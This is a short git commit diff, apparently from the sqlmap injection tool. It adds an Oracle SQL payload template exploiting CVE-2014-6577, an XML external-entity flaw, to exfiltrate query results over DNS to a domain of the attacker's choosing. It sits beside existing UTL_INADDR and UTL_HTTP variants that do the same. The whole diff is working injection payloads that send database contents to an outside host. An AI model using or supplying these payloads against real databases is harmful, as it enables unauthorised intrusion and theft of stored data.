add support to leverage CVE-2014-6577 for Oracle DNS data exfiltration (#5410)

Loma95 · marvin · web-flow · commit 48c967c01d8b · 2023-05-25T11:27:15.000+02:00
Co-authored-by: marvin &lt;marvin@debian-BULLSEYE-live-builder-AMD64&gt;
diff --git a/data/procs/oracle/dns_request.sql b/data/procs/oracle/dns_request.sql
@@ -1,2 +1,3 @@
 SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
 # or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%') FROM DUAL
+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'||(%QUERY%)||'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual 

Original file line number	Diff line number	Diff line change
`@@ -1,2 +1,3 @@`
`1`	`1`	`SELECT UTL_INADDR.GET_HOST_ADDRESS('%PREFIX%.'\|\|(%QUERY%)\|\|'.%SUFFIX%.%DOMAIN%') FROM DUAL`
`2`	`2`	`# or SELECT UTL_HTTP.REQUEST('http://%PREFIX%.'\|\|(%QUERY%)\|\|'.%SUFFIX%.%DOMAIN%') FROM DUAL`
	`3`	`+# or (CVE-2014-6577) SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://%PREFIX%.'\|\|(%QUERY%)\|\|'.%SUFFIX%.%DOMAIN%/"> %remote;]>'),'/l') FROM dual`